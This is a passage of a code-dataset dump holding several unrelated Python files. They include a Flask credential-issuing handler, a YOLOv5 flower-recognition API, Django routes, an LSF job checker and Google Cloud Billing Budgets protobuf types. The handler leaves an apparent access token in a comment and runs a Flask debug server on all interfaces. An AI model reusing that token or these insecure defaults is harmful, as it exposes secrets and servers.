有效的括号.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"264638370","text":"import requests, json, os\nfrom flask import Flask, request, jsonify\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\n\nadmin_controller_url = os.environ[\"ADMIN_CONTROLLER_URL\"]\n\n########## CREDENTIAL ISSUING ###########\n@app.route('/receive', methods=['POST'])\ndef handler_receiver():\n global value\n value = request.json\n print(value)\n return value\n\n@app.route('/accept', methods=['GET'])\ndef handler_sender():\n res_to_admin_agent = {\n\t \"holder_request_id\": value[\"holder_request_id\"],\n \"type\": value[\"type\"],\n \"credentialSubject\": {\n \"id\": value[\"credentialSubject\"][\"id\"],\n \"claims\": value[\"credentialSubject\"][\"claims\"]\n },\n \"service_endpoint\": value[\"service_endpoint\"]\n }\n \n #print(value[\"holder_request_id\"])\n print(res_to_admin_agent)\n resp = requests.post(admin_controller_url+\"/issuer/issue_requested_credential/\"+value[\"_id\"], json=res_to_admin_agent, timeout=60) #+\"?token=9af0301f-a431-49ac-a7bb-f29fbf2adea3\"\n body = resp.json()\n return body\n\n########## STAKEHOLDER REGISTRATION ###########\n@app.route('/stakeholder/receive', methods=['POST'])\ndef handler_stakeholder_receiver():\n global stake_value\n stake_value = request.json\n print(stake_value)\n return stake_value\n\n@app.route('/stakeholder/accept', methods=['GET'])\ndef handler_stakeholder_sender():\n res_stake_admin_agent = {\n\t \"holder_request_id\": stake_value[\"holder_request_id\"],\n \"stakeholderClaim\": {\n \"governanceBoardDID\": stake_value[\"stakeholderClaim\"][\"governanceBoardDID\"],\n \"stakeholderServices\": stake_value[\"stakeholderClaim\"][\"stakeholderServices\"],\n \"stakeholderRoles\": {\n \"role\": stake_value[\"stakeholderClaim\"][\"stakeholderRoles\"][\"role\"],\n \"assets\": stake_value[\"stakeholderClaim\"][\"stakeholderRoles\"][\"assets\"]\n },\n \"stakeholderProfile\": {\n \"name\": stake_value[\"stakeholderClaim\"][\"stakeholderProfile\"][\"name\"],\n \"address\": stake_value[\"stakeholderClaim\"][\"stakeholderProfile\"][\"address\"]\n },\n \"did\": stake_value[\"stakeholderClaim\"][\"did\"],\n \"verkey\": stake_value[\"stakeholderClaim\"][\"verkey\"]\n },\n \"service_endpoint\": stake_value[\"service_endpoint\"]\n }\n \n #print(stake_value[\"holder_request_id\"])\n print(res_stake_admin_agent)\n resp = requests.post(admin_controller_url+\"/issuer/issue_stakeholder/\"+stake_value[\"_id\"], json=res_stake_admin_agent, timeout=60)\n body = resp.json()\n return body\n#--------------------------------------------------------------------------------------#\nif __name__ == \"__main__\":\n app.run(port='4800', host='0.0.0.0', debug='true')\n ","sub_path":"handler_example/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"200463152","text":"from src.recognizer.recognizer import Recognizer\nfrom src.database.data_manager import DataManager\nfrom src.email.email_manager import EmailManager\nimport argparse\nimport json\nimport sys\n\n\ndef run(inputpath, storepath):\n\n # inputpath = r\"C:\\Users\\alessio\\Desktop\\repo_input\"\n # storepath = r\"C:\\Users\\alessio\\Desktop\\repo\"\n\n # inputpath = \"/app/vol/img_input\"\n # storepath = \"/app/vol/img_store\"\n\n print(\"testrun start ...\\n\")\n\n try:\n recognizer = 
Recognizer(storepath)\n records = recognizer.recognize_all(inputpath, debug=True)\n except Exception as e:\n print(\"Recognizer: {}\".format(e))\n sys.exit()\n\n items = []\n for record in records:\n item = {'input_file': record.input_file,\n 'hit_file': record.hit_file,\n 'sim': record.sim,\n 'is_match': record.is_match}\n items.append(item)\n\n try:\n data_manager = DataManager()\n data_manager.insert_matches(items)\n except Exception as e:\n print(\"DataManager: {}\".format(e))\n sys.exit()\n\n try:\n body = json.dumps(items)\n email_manager = EmailManager()\n email_manager.send(body)\n except Exception as e:\n print(\"EmailManager: {}\".format(e))\n sys.exit()\n\n print(\"\\ntestrun complete\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='\\ncvrecognizer testrun')\n parser.add_argument('input', help='input images folder')\n parser.add_argument('store', help='store images folder')\n args = vars(parser.parse_args())\n input_folder = args['input']\n store_folder = args['store']\n print(\"source: {}\\nstore: {}\".format(input_folder, store_folder))\n run(input_folder, store_folder)\n","sub_path":"testrun.py","file_name":"testrun.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393747470","text":"import datetime\r\nimport io\r\n\r\nimport torch\r\nfrom PIL import Image\r\nfrom sqlalchemy import func\r\n\r\nfrom db_connect import db\r\nfrom flask import Blueprint\r\nimport cv2\r\nfrom keras.models import load_model\r\nimport pandas as pd\r\nimport detect\r\nfrom db_models import Target, Flower\r\nimport os\r\nimport shutil\r\nfrom flask import request, jsonify\r\nfrom werkzeug.utils import secure_filename\r\n\r\nanalyzed = Blueprint('analyzed', __name__)\r\nmodel = torch.hub.load('/home/ukiiing00/Yolov5/SeochoFlower', 'custom',\r\n path='/home/ukiiing00/Yolov5/SeochoFlower/ml/best.pt', source='local') # local repo\r\n\r\n@analyzed.route(\"/analyze\", methods=[\"GET\", \"POST\"])\r\ndef analyze():\r\n if request.method == \"POST\":\r\n\r\n imageFile = request.form[\"src\"]\r\n imageFile = imageFile.rsplit(\"/\")[-1]\r\n\r\n with open(\"/home/ukiiing00/Yolov5/SeochoFlower/static/img/\" + imageFile, 'rb') as f:\r\n fileRead = f.read()\r\n img = Image.open(io.BytesIO(fileRead))\r\n # 이미지파일 임시 저장\r\n savePath = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/train/\" # 매번 비워지는 임시 저장소\r\n savePath2 = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/val/\" # 누적 저장\r\n if os.path.exists(savePath):\r\n shutil.rmtree(savePath) # 파일 삭제\r\n if not os.path.exists(savePath):\r\n os.mkdir(savePath) # 디렉토리 생성\r\n\r\n # 이미지 디텍션을 위한 임시 저장\r\n img.save(savePath + secure_filename(imageFile))\r\n\r\n with open(\"/home/ukiiing00/Yolov5/SeochoFlower/static/img/\" + imageFile, 'rb') as f:\r\n fileRead = f.read()\r\n img = Image.open(io.BytesIO(fileRead))\r\n img.save(savePath2 + secure_filename(imageFile))\r\n\r\n # imageFile = \"C:/Users/jinsung/Downloads/boardtest\" + imageFile\r\n imageFile = imageFile.rsplit(\"/\")[-1]\r\n\r\n\r\n\r\n # 이미지 디텍션 실행\r\n detect.run()\r\n results = model(savePath + secure_filename(imageFile), size=640) # reduce size=320 for faster inference\r\n\r\n json_data = pd.DataFrame(results.pandas().xyxy[0], columns=[\"class\"])\r\n result_list = []\r\n for i in range(0, len(json_data)):\r\n result_list.append(json_data.values[i][0])\r\n\r\n # 중복 제거\r\n result_list = set(result_list)\r\n result_list = list(result_list)\r\n\r\n 
print(result_list)\r\n\r\n dict={0:'거베라_거베라',\r\n 1: '국화_코스모스',\r\n 2: '국화_디스버드',\r\n 3: '국화_백선',\r\n 4: '튤립_레드',\r\n 5: '튤립_로얄버진',\r\n 6: '백합_메두사',\r\n 7: '백합_시베리아',\r\n 8: '수국_그린',\r\n 9: '수국_핑크',\r\n 10: '데이지_데이지',\r\n 11: '데이지_겹',\r\n 12: '용담_용담',\r\n 13: '장미_푸에고',\r\n 14: '장미_하젤',\r\n 15: '카네이션_핑크',\r\n 16: '카네이션_레드(스프레이)',\r\n 17: '안개_오버타임',\r\n 18: '해바라기_겹',\r\n 19: '해바라기_해바라기',\r\n 20: 'out_of_distribution'}\r\n\r\n flower_list = []\r\n for i in range(0, len(result_list)):\r\n if result_list[i] != 20:\r\n flower_list.append(dict[result_list[i]])\r\n print(flower_list)\r\n if flower_list== []:\r\n flower_list.append('올바른 사진을 넣어주세요')\r\n\r\n return jsonify(flower_list)\r\n\r\n\r\n@analyzed.route(\"/image_detect\", methods=[\"GET\", \"POST\"])\r\ndef detect_image():\r\n if request.method == \"POST\":\r\n print(request.files)\r\n # try:\r\n if 'input-image' in request.files:\r\n imageFile = request.files['input-image']\r\n\r\n f = imageFile.filename\r\n # 이미지파일 임시 저장\r\n savePath = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/train/\" # 매번 비워지는 임시 저장소\r\n savePath2 = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/val/\" # 누적 저장\r\n print('working1')\r\n if os.path.exists(savePath):\r\n shutil.rmtree(savePath) # 파일 삭제\r\n if not os.path.exists(savePath):\r\n os.mkdir(savePath) # 디렉토리 생성\r\n\r\n # 이미지 디텍션을 위한 임시 저장\r\n imageFile.save(savePath + secure_filename(f))\r\n imageFile.save(savePath2 + secure_filename(f))\r\n\r\n # 이미지 디텍션 실행\r\n detect.run()\r\n # with open(savePath + secure_filename(f), 'rb') as ff:\r\n # fileRead = ff.read()\r\n # img = Image.open(io.BytesIO(fileRead))\r\n # results = model(img, size=640) # reduce size=320 for faster inference\r\n res = model(savePath + secure_filename(f), size=640)\r\n #img.save(savePath2 + secure_filename(f))\r\n\r\n # except Exception as e:\r\n # print('Exception',e)\r\n\r\n result_list = []\r\n resdata = res.pandas().xyxy[0]\r\n json_data = pd.DataFrame(resdata, columns=[\"class\"])\r\n\r\n for i in range(0, len(json_data)):\r\n result_list.append(json_data.values[i][0])\r\n\r\n # 중복 제거\r\n result_list = set(result_list)\r\n result_list = list(result_list)\r\n\r\n print(result_list)\r\n\r\n dict={0:'거베라_거베라',\r\n 1: '국화_코스모스',\r\n 2: '국화_디스버드',\r\n 3: '국화_백선',\r\n 4: '튤립_레드',\r\n 5: '튤립_로얄버진',\r\n 6: '백합_메두사',\r\n 7: '백합_시베리아',\r\n 8: '수국_그린',\r\n 9: '수국_핑크',\r\n 10: '데이지_데이지',\r\n 11: '데이지_겹',\r\n 12: '용담_용담',\r\n 13: '장미_푸에고',\r\n 14: '장미_하젤',\r\n 15: '카네이션_핑크',\r\n 16: '카네이션_레드(스프레이)',\r\n 17: '안개_오버타임',\r\n 18: '해바라기_겹',\r\n 19: '해바라기_해바라기',\r\n 20: 'out_of_distribution'}\r\n\r\n flower_list = []\r\n for i in range(0,len(result_list)):\r\n flower_list.append(dict[result_list[i]])\r\n print(flower_list)\r\n return jsonify(flower_list)\r\n\r\n\r\n@analyzed.route(\"/analyse_result\", methods=[\"GET\"])\r\ndef analyse_image():\r\n # 꽃 품목_품종 가져오기\r\n fl_name = request.args.get(\"flower_name\")\r\n print(fl_name)\r\n\r\n #문자열 스플릿\r\n fl_item, fl_type = str(fl_name).split('_')\r\n\r\n flist = Target(fl_item, fl_type)\r\n db.session.add(flist)\r\n db.session.commit()\r\n print(flist.fl_item, flist.fl_type)\r\n\r\n # 딕셔너리에 담아서 json 형태로 변환하여 전송\r\n flower_dict = []\r\n\r\n today = datetime.datetime.today().strftime(\"%Y-%m-%d\")\r\n fcost = db.session.query(Flower.poomname, Flower.goodname, Flower.lvname, func.sum(Flower.qty).label('qty'),\r\n func.avg(Flower.cost).label('cost'), Flower.dateinfo). \\\r\n filter(Flower.poomname == flist.fl_item, Flower.goodname == flist.fl_type). 
\\\r\n filter(Flower.dateinfo >= func.ADDDATE(today, -7)). \\\r\n group_by(Flower.lvname).all()\r\n\r\n assert isinstance(fcost, object)\r\n for f in fcost:\r\n flower_dict.append({\r\n \"poomname\": f.poomname,\r\n \"goodname\": f.goodname,\r\n \"lvname\": f.lvname,\r\n \"cost\": int(f.cost),\r\n \"qty\": int(f.qty),\r\n \"dateinfo\": str(f.dateinfo)\r\n })\r\n print(flower_dict)\r\n\r\n return jsonify(flower_dict)","sub_path":"analyze_api.py","file_name":"analyze_api.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"310230143","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('search', views.search, name='search'),\n path('search_by_tag/', views.search_by_tag, name='search_by_tag'),\n path('terms_of_use', views.terms_of_use, name='terms_of_use'),\n path('license_agreements', views.license_agreements, name='license_agreements'),\n]\n","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597087472","text":"import subprocess\nimport os\nimport time\n\n\ndef wait_for_jobs(user, max_wait_time=None):\n t_start = time.time()\n while True:\n time.sleep(5)\n n_running = subprocess.check_output(['bjobs | grep %s | wc -l' % user], shell=True).decode()\n n_running = int(n_running.strip('\\n'))\n if n_running == 0:\n break\n if max_wait_time is not None:\n t_wait = time.time() - t_start\n if t_wait > max_wait_time:\n print(\"MAX WAIT TIME EXCEEDED\")\n break\n\n\ndef wait_and_check_multiple_jobs(job_prefix, n_jobs, user='papec'):\n\n success_marker = 'Success'\n wait_for_jobs(user)\n\n jobs_failed = []\n for job_id in range(n_jobs):\n log_file = './logs/log_%s_%i.log' % (job_prefix, job_id)\n\n have_log = os.path.exists(log_file)\n if not have_log:\n jobs_failed.append(job_id)\n continue\n\n with open(log_file, 'r') as f:\n out = f.readline()\n have_success = out[:len(success_marker)] == success_marker\n if not have_success:\n jobs_failed.append(job_id)\n continue\n\n return jobs_failed\n\n\ndef wait_and_check_single_job(job_name, user='papec'):\n\n success_marker = 'Success'\n wait_for_jobs(user)\n\n log_file = './logs/log_%s.log' % job_name\n\n job_failed = False\n have_log = os.path.exists(log_file)\n if not have_log:\n job_failed = True\n\n with open(log_file, 'r') as f:\n out = f.readline()\n have_success = out[:len(success_marker)] == success_marker\n if not have_success:\n job_failed = True\n\n return job_failed\n\n\ndef wait_and_check_multiple_jobnames(job_names, user='papec'):\n\n success_marker = 'Success'\n wait_for_jobs(user)\n\n jobs_failed = []\n for job_name in job_names:\n log_file = './logs/log_%s.log' % job_name\n\n have_log = os.path.exists(log_file)\n if not have_log:\n jobs_failed.append(job_name)\n continue\n\n with open(log_file, 'r') as f:\n out = f.readline()\n have_success = out[:len(success_marker)] == success_marker\n if not have_success:\n jobs_failed.append(job_name)\n continue\n\n return jobs_failed\n","sub_path":"deprecated/cluster_tools/wait_and_check.py","file_name":"wait_and_check.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561888106","text":"from typing import Iterable\nfrom collections import Counter\n\n\nclass Classifier:\n def __init__(self):\n 
self.contains_doubles = []\n self.contains_triples = []\n\n def add_id(self, id_: str):\n counter = Counter()\n\n for letter in id_:\n counter[letter] += 1\n\n if any(count == 2 for _, count in counter.items()):\n self.contains_doubles.append(id_)\n\n if any(count == 3 for _, count in counter.items()):\n self.contains_triples.append(id_)\n\n\ndef classify_ids(ids: Iterable) -> Classifier:\n classifier = Classifier()\n for id_ in ids:\n classifier.add_id(id_)\n return classifier\n\n\nif __name__ == '__main__':\n with open('data/2.txt', 'r') as file:\n classifier = classify_ids([x.strip() for x in file.readlines()])\n\n print((\n \" Doubles: {}\\n\"\n \" Triples: {}\\n\"\n \"Checksum (d * t): {}\"\n ).format(\n len(classifier.contains_doubles),\n len(classifier.contains_triples),\n len(classifier.contains_doubles) * len(classifier.contains_triples)\n ))\n","sub_path":"d2_1.py","file_name":"d2_1.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409105170","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nfrom google.protobuf import struct_pb2 # type: ignore\nfrom google.type import date_pb2 # type: ignore\nfrom google.type import money_pb2 # type: ignore\nimport proto # type: ignore\n\n__protobuf__ = proto.module(\n package=\"google.cloud.billing.budgets.v1beta1\",\n manifest={\n \"CalendarPeriod\",\n \"Budget\",\n \"BudgetAmount\",\n \"LastPeriodAmount\",\n \"ThresholdRule\",\n \"AllUpdatesRule\",\n \"Filter\",\n \"CustomPeriod\",\n },\n)\n\n\nclass CalendarPeriod(proto.Enum):\n r\"\"\"A ``CalendarPeriod`` represents the abstract concept of a time\n period that has a canonical start. Grammatically, \"the start of the\n current ``CalendarPeriod``\". All calendar times begin at 12 AM US\n and Canadian Pacific Time (UTC-8).\n\n Values:\n CALENDAR_PERIOD_UNSPECIFIED (0):\n Calendar period is unset. This is the default\n if the budget is for a custom time period\n (CustomPeriod).\n MONTH (1):\n A month. Month starts on the first day of\n each month, such as January 1, February 1, March\n 1, and so on.\n QUARTER (2):\n A quarter. Quarters start on dates January 1,\n April 1, July 1, and October 1 of each year.\n YEAR (3):\n A year. Year starts on January 1.\n \"\"\"\n CALENDAR_PERIOD_UNSPECIFIED = 0\n MONTH = 1\n QUARTER = 2\n YEAR = 3\n\n\nclass Budget(proto.Message):\n r\"\"\"A budget is a plan that describes what you expect to spend on\n Cloud projects, plus the rules to execute as spend is tracked\n against that plan, (for example, send an alert when 90% of the\n target spend is met). The budget time period is configurable,\n with options such as month (default), quarter, year, or custom\n time period.\n\n Attributes:\n name (str):\n Output only. Resource name of the budget. The resource name\n implies the scope of a budget. 
Values are of the form\n ``billingAccounts/{billingAccountId}/budgets/{budgetId}``.\n display_name (str):\n User data for display name in UI.\n Validation: <= 60 chars.\n budget_filter (google.cloud.billing.budgets_v1beta1.types.Filter):\n Optional. Filters that define which resources\n are used to compute the actual spend against the\n budget amount, such as projects, services, and\n the budget's time period, as well as other\n filters.\n amount (google.cloud.billing.budgets_v1beta1.types.BudgetAmount):\n Required. Budgeted amount.\n threshold_rules (MutableSequence[google.cloud.billing.budgets_v1beta1.types.ThresholdRule]):\n Optional. Rules that trigger alerts (notifications of\n thresholds being crossed) when spend exceeds the specified\n percentages of the budget.\n\n Optional for ``pubsubTopic`` notifications.\n\n Required if using email notifications.\n all_updates_rule (google.cloud.billing.budgets_v1beta1.types.AllUpdatesRule):\n Optional. Rules to apply to notifications\n sent based on budget spend and thresholds.\n etag (str):\n Optional. Etag to validate that the object is\n unchanged for a read-modify-write operation.\n An empty etag will cause an update to overwrite\n other changes.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n display_name: str = proto.Field(\n proto.STRING,\n number=2,\n )\n budget_filter: \"Filter\" = proto.Field(\n proto.MESSAGE,\n number=3,\n message=\"Filter\",\n )\n amount: \"BudgetAmount\" = proto.Field(\n proto.MESSAGE,\n number=4,\n message=\"BudgetAmount\",\n )\n threshold_rules: MutableSequence[\"ThresholdRule\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=5,\n message=\"ThresholdRule\",\n )\n all_updates_rule: \"AllUpdatesRule\" = proto.Field(\n proto.MESSAGE,\n number=6,\n message=\"AllUpdatesRule\",\n )\n etag: str = proto.Field(\n proto.STRING,\n number=7,\n )\n\n\nclass BudgetAmount(proto.Message):\n r\"\"\"The budgeted amount for each usage period.\n\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n specified_amount (google.type.money_pb2.Money):\n A specified amount to use as the budget. ``currency_code``\n is optional. If specified when creating a budget, it must\n match the currency of the billing account. If specified when\n updating a budget, it must match the currency_code of the\n existing budget. The ``currency_code`` is provided on\n output.\n\n This field is a member of `oneof`_ ``budget_amount``.\n last_period_amount (google.cloud.billing.budgets_v1beta1.types.LastPeriodAmount):\n Use the last period's actual spend as the budget for the\n present period. 
LastPeriodAmount can only be set when the\n budget's time period is a\n [Filter.calendar_period][google.cloud.billing.budgets.v1beta1.Filter.calendar_period].\n It cannot be set in combination with\n [Filter.custom_period][google.cloud.billing.budgets.v1beta1.Filter.custom_period].\n\n This field is a member of `oneof`_ ``budget_amount``.\n \"\"\"\n\n specified_amount: money_pb2.Money = proto.Field(\n proto.MESSAGE,\n number=1,\n oneof=\"budget_amount\",\n message=money_pb2.Money,\n )\n last_period_amount: \"LastPeriodAmount\" = proto.Field(\n proto.MESSAGE,\n number=2,\n oneof=\"budget_amount\",\n message=\"LastPeriodAmount\",\n )\n\n\nclass LastPeriodAmount(proto.Message):\n r\"\"\"Describes a budget amount targeted to the last\n [Filter.calendar_period][google.cloud.billing.budgets.v1beta1.Filter.calendar_period]\n spend. At this time, the amount is automatically 100% of the last\n calendar period's spend; that is, there are no other options yet.\n Future configuration options will be described here (for example,\n configuring a percentage of last period's spend). LastPeriodAmount\n cannot be set for a budget configured with a\n [Filter.custom_period][google.cloud.billing.budgets.v1beta1.Filter.custom_period].\n\n \"\"\"\n\n\nclass ThresholdRule(proto.Message):\n r\"\"\"ThresholdRule contains the definition of a threshold. Threshold\n rules define the triggering events used to generate a budget\n notification email. When a threshold is crossed (spend exceeds the\n specified percentages of the budget), budget alert emails are sent\n to the email recipients you specify in the\n `NotificationsRule <#notificationsrule>`__.\n\n Threshold rules also affect the fields included in the `JSON data\n object `__\n sent to a Pub/Sub topic.\n\n Threshold rules are *required* if using email notifications.\n\n Threshold rules are *optional* if only setting a ```pubsubTopic``\n NotificationsRule <#NotificationsRule>`__, unless you want your JSON\n data object to include data about the thresholds you set.\n\n For more information, see `set budget threshold rules and\n actions `__.\n\n Attributes:\n threshold_percent (float):\n Required. Send an alert when this threshold\n is exceeded. This is a 1.0-based percentage, so\n 0.5 = 50%. Validation: non-negative number.\n spend_basis (google.cloud.billing.budgets_v1beta1.types.ThresholdRule.Basis):\n Optional. The type of basis used to determine if spend has\n passed the threshold. Behavior defaults to CURRENT_SPEND if\n not set.\n \"\"\"\n\n class Basis(proto.Enum):\n r\"\"\"The type of basis used to determine if spend has passed the\n threshold.\n\n Values:\n BASIS_UNSPECIFIED (0):\n Unspecified threshold basis.\n CURRENT_SPEND (1):\n Use current spend as the basis for comparison\n against the threshold.\n FORECASTED_SPEND (2):\n Use forecasted spend for the period as the basis for\n comparison against the threshold. 
FORECASTED_SPEND can only\n be set when the budget's time period is a\n [Filter.calendar_period][google.cloud.billing.budgets.v1beta1.Filter.calendar_period].\n It cannot be set in combination with\n [Filter.custom_period][google.cloud.billing.budgets.v1beta1.Filter.custom_period].\n \"\"\"\n BASIS_UNSPECIFIED = 0\n CURRENT_SPEND = 1\n FORECASTED_SPEND = 2\n\n threshold_percent: float = proto.Field(\n proto.DOUBLE,\n number=1,\n )\n spend_basis: Basis = proto.Field(\n proto.ENUM,\n number=2,\n enum=Basis,\n )\n\n\nclass AllUpdatesRule(proto.Message):\n r\"\"\"AllUpdatesRule defines notifications that are sent based on\n budget spend and thresholds.\n\n Attributes:\n pubsub_topic (str):\n Optional. The name of the Pub/Sub topic where budget related\n messages will be published, in the form\n ``projects/{project_id}/topics/{topic_id}``. Updates are\n sent at regular intervals to the topic. The topic needs to\n be created before the budget is created; see\n https://cloud.google.com/billing/docs/how-to/budgets-programmatic-notifications\n for more details. Caller is expected to have\n ``pubsub.topics.setIamPolicy`` permission on the topic when\n it's set for a budget, otherwise, the API call will fail\n with PERMISSION_DENIED. See\n https://cloud.google.com/billing/docs/how-to/budgets-programmatic-notifications#permissions_required_for_this_task\n for more details on Pub/Sub roles and permissions.\n schema_version (str):\n Optional. Required when\n [AllUpdatesRule.pubsub_topic][google.cloud.billing.budgets.v1beta1.AllUpdatesRule.pubsub_topic]\n is set. The schema version of the notification sent to\n [AllUpdatesRule.pubsub_topic][google.cloud.billing.budgets.v1beta1.AllUpdatesRule.pubsub_topic].\n Only \"1.0\" is accepted. It represents the JSON schema as\n defined in\n https://cloud.google.com/billing/docs/how-to/budgets-programmatic-notifications#notification_format.\n monitoring_notification_channels (MutableSequence[str]):\n Optional. Targets to send notifications to when a threshold\n is exceeded. This is in addition to default recipients who\n have billing account IAM roles. The value is the full REST\n resource name of a monitoring notification channel with the\n form\n ``projects/{project_id}/notificationChannels/{channel_id}``.\n A maximum of 5 channels are allowed. See\n https://cloud.google.com/billing/docs/how-to/budgets-notification-recipients\n for more details.\n disable_default_iam_recipients (bool):\n Optional. When set to true, disables default\n notifications sent when a threshold is exceeded.\n Default notifications are sent to those with\n Billing Account Administrator and Billing\n Account User IAM roles for the target account.\n enable_project_level_recipients (bool):\n Optional. When set to true, and when the budget has a single\n project configured, notifications will be sent to project\n level recipients of that project. 
This field will be ignored\n if the budget has multiple or no project configured.\n\n Currently, project level recipients are the users with\n ``Owner`` role on a cloud project.\n \"\"\"\n\n pubsub_topic: str = proto.Field(\n proto.STRING,\n number=1,\n )\n schema_version: str = proto.Field(\n proto.STRING,\n number=2,\n )\n monitoring_notification_channels: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=3,\n )\n disable_default_iam_recipients: bool = proto.Field(\n proto.BOOL,\n number=4,\n )\n enable_project_level_recipients: bool = proto.Field(\n proto.BOOL,\n number=5,\n )\n\n\nclass Filter(proto.Message):\n r\"\"\"A filter for a budget, limiting the scope of the cost to\n calculate.\n\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n projects (MutableSequence[str]):\n Optional. A set of projects of the form\n ``projects/{project}``, specifying that usage from only this\n set of projects should be included in the budget. If\n omitted, the report will include all usage for the billing\n account, regardless of which project the usage occurred on.\n resource_ancestors (MutableSequence[str]):\n Optional. A set of folder and organization names of the form\n ``folders/{folderId}`` or\n ``organizations/{organizationId}``, specifying that usage\n from only this set of folders and organizations should be\n included in the budget. If omitted, the budget includes all\n usage that the billing account pays for. If the folder or\n organization contains projects that are paid for by a\n different Cloud Billing account, the budget *doesn't* apply\n to those projects.\n credit_types (MutableSequence[str]):\n Optional. If\n [Filter.credit_types_treatment][google.cloud.billing.budgets.v1beta1.Filter.credit_types_treatment]\n is INCLUDE_SPECIFIED_CREDITS, this is a list of credit types\n to be subtracted from gross cost to determine the spend for\n threshold calculations. See `a list of acceptable credit\n type\n values `__.\n\n If\n [Filter.credit_types_treatment][google.cloud.billing.budgets.v1beta1.Filter.credit_types_treatment]\n is **not** INCLUDE_SPECIFIED_CREDITS, this field must be\n empty.\n credit_types_treatment (google.cloud.billing.budgets_v1beta1.types.Filter.CreditTypesTreatment):\n Optional. If not set, default behavior is\n ``INCLUDE_ALL_CREDITS``.\n services (MutableSequence[str]):\n Optional. A set of services of the form\n ``services/{service_id}``, specifying that usage from only\n this set of services should be included in the budget. If\n omitted, the report will include usage for all the services.\n The service names are available through the Catalog API:\n https://cloud.google.com/billing/v1/how-tos/catalog-api.\n subaccounts (MutableSequence[str]):\n Optional. A set of subaccounts of the form\n ``billingAccounts/{account_id}``, specifying that usage from\n only this set of subaccounts should be included in the\n budget. If a subaccount is set to the name of the parent\n account, usage from the parent account will be included. If\n omitted, the report will include usage from the parent\n account and all subaccounts, if they exist.\n labels (MutableMapping[str, google.protobuf.struct_pb2.ListValue]):\n Optional. 
A single label and value pair specifying that\n usage from only this set of labeled resources should be\n included in the budget. If omitted, the report will include\n all labeled and unlabeled usage.\n\n An object containing a single ``\"key\": value`` pair.\n Example: ``{ \"name\": \"wrench\" }``.\n\n *Currently, multiple entries or multiple values per entry\n are not allowed.*\n calendar_period (google.cloud.billing.budgets_v1beta1.types.CalendarPeriod):\n Optional. Specifies to track usage for\n recurring calendar period. For example, assume\n that CalendarPeriod.QUARTER is set. The budget\n will track usage from April 1 to June 30, when\n the current calendar month is April, May, June.\n After that, it will track usage from July 1 to\n September 30 when the current calendar month is\n July, August, September, so on.\n\n This field is a member of `oneof`_ ``usage_period``.\n custom_period (google.cloud.billing.budgets_v1beta1.types.CustomPeriod):\n Optional. Specifies to track usage from any\n start date (required) to any end date\n (optional). This time period is static, it does\n not recur.\n\n This field is a member of `oneof`_ ``usage_period``.\n \"\"\"\n\n class CreditTypesTreatment(proto.Enum):\n r\"\"\"Specifies how credits are applied when determining the spend for\n threshold calculations. Budgets track the total cost minus any\n applicable selected credits. `See the documentation for a list of\n credit\n types `__.\n\n Values:\n CREDIT_TYPES_TREATMENT_UNSPECIFIED (0):\n No description available.\n INCLUDE_ALL_CREDITS (1):\n All types of credit are subtracted from the\n gross cost to determine the spend for threshold\n calculations.\n EXCLUDE_ALL_CREDITS (2):\n All types of credit are added to the net cost\n to determine the spend for threshold\n calculations.\n INCLUDE_SPECIFIED_CREDITS (3):\n `Credit\n types `__\n specified in the credit_types field are subtracted from the\n gross cost to determine the spend for threshold\n calculations.\n \"\"\"\n CREDIT_TYPES_TREATMENT_UNSPECIFIED = 0\n INCLUDE_ALL_CREDITS = 1\n EXCLUDE_ALL_CREDITS = 2\n INCLUDE_SPECIFIED_CREDITS = 3\n\n projects: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=1,\n )\n resource_ancestors: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=2,\n )\n credit_types: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=7,\n )\n credit_types_treatment: CreditTypesTreatment = proto.Field(\n proto.ENUM,\n number=4,\n 